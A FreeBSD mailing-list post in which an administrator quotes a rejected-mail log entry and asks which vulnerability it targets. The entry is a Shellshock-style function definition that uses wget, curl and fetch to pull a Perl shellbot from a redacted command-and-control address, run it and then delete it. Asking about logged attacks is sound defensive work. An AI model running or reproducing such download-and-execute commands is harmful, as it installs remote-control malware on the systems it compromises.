Date: Sun, 11 Jun 2023 13:38:58 +0200 From: Andrea Venturoli <ml@netfence.it> To: freebsd-questions@freebsd.org Subject: Attempted mail attack Message-ID: <7128b00c-0427-6f76-bd37-770947aae245@netfence.it>
next in thread | raw e-mail | index | archive | help
Hello.
Checking daily periodics of different servers, I'm seeing a variation of
this:
> Checking for rejected mail hosts:
> 1 553 check_mail () { :; }; cd /tmp;wget x.y.z.w5/meh;perl meh;curl -O x.y.z.w/meh;perl meh;fetch http://x.y.z.w/meh;perl meh;rm -f meh* {:;};cd/tmp;wget.x.y.z.w/meh;...
(I've redacted the C&C IP, even if it's already down).
Of course they are attempting to download a Perl Shellbot (and failing).
I'm curious, though, what vulnerability they are trying to exploit in
order to do this?
Is it some old one in sendmail? Or what?
bye & Thanks
av.
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?7128b00c-0427-6f76-bd37-770947aae245>
